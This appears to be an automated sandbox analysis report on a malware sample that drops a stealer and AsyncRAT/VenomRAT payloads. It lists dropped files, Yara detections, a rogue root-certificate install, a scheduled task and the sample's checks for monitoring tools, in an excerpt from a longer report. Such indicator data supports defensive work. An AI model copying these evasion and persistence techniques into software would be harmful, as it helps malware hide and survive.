Source: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Code function: 26_2_074EF530 push esp; ret	26_2_074EF531
Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Code function: 28_2_0634ECF2 push eax; ret	28_2_0634ED01
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_0040232D push eax; ret	30_2_00402331
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_00403282 push eax; ret	30_2_0040328B
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_00402097 push eax; retf	30_2_0040209B
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_00401BB2 push ebp; retf	30_2_00401BB3
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C6D74 push edi; iretd	30_2_007C6D75
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C3C68 push es; retf	30_2_007C3C82
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C540B pushad ; retf	30_2_007C540F
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C4502 push esp; retf	30_2_007C4535
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C48DD push eax; retf	30_2_007C48EB
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C3BCD push cs; ret	30_2_007C3BD4
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C53C0 push E60329CCh; iretd	30_2_007C53D5
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C3EC3 pushad ; retf	30_2_007C3ECE
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_007C57B0 push eax; ret	30_2_007C57B3
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_00882394 push eax; ret	30_2_00882398
Source: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Code function: 30_2_008820FE push eax; retf	30_2_00882102

Source: PQ2AUndsdb.exe	Static PE information: section name: entropy: 7.976742383146677
Source: PQ2AUndsdb.exe	Static PE information: section name: rxawdntq entropy: 7.9536549363318265
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.976742383146677
Source: axplong.exe.0.dr	Static PE information: section name: rxawdntq entropy: 7.9536549363318265
Source: whiteheroin.exe.17.dr	Static PE information: section name: .text entropy: 7.210082648200753
Source: GOLD[1].exe.17.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: GOLD.exe.17.dr	Static PE information: section name: .text entropy: 7.994093571693808
Source: crypteda[1].exe.17.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: crypteda.exe.17.dr	Static PE information: section name: .text entropy: 7.99930616062516
Source: setup2[1].exe.17.dr	Static PE information: section name: .text entropy: 7.671944335384517
Source: setup2.exe.17.dr	Static PE information: section name: .text entropy: 7.671944335384517

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\40365\Beijing.pif

Jump to dropped file

Installs new ROOT certificates

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000005001\setup2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\whiteheroin[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\BitcoinCore[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\runtime[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000192001\whiteheroin.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Set-up[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\40365\Beijing.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\crypteda[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\whicctb	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\wxfM3haI2K.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\GOLD[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Roaming\XBckuYbXje.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\stealc_default2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\setup2[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000150001\runtime.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\whicctb

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 38.0.XClient_protected.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000000.2086470642.0000000000DF2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\XClient_protected[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000190001\XClient_protected.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: XClient_protected.exe PID: 6224, type: MEMORYSTR

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\whicctb:Zone.Identifier read attributes | delete

Source: C:\Users\user\AppData\Roaming\XBckuYbXje.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\GOLD.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
